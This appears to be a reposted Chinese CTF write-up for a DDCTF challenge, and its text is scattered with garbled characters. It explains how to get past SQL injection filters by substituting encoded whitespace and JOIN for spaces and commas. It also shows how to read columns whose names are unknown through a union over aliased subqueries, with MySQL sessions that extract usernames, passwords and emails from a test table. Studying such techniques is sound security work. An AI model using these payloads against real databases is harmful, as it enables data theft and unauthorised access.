本文介紹的是DDCTF第五題,繞過(guò)未知字段名的技巧����,這里拿本機(jī)來(lái)操作了下���,思路很棒也很清晰��,分享給大家��,下面來(lái)看看詳細(xì)的介紹:
題目過(guò)濾空格和逗號(hào)�����,空格使用%0a�����,%0b�,%0c,%0d���,%a0�����,或者直接使用括號(hào)都可以繞過(guò)�,逗號(hào)使用join繞過(guò)�;
存放flag的字段名未知,information_schema.columns也將表名的hex過(guò)濾了��,即獲取不到字段名���;這時(shí)可以利用聯(lián)合查詢�����,過(guò)程如下:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4 |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
以上就是這篇文章的全部?jī)?nèi)容了���,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來(lái)一定的幫助�,如果有疑問(wèn)大家可以留言交流��,謝謝大家對(duì)腳本之家的支持�。
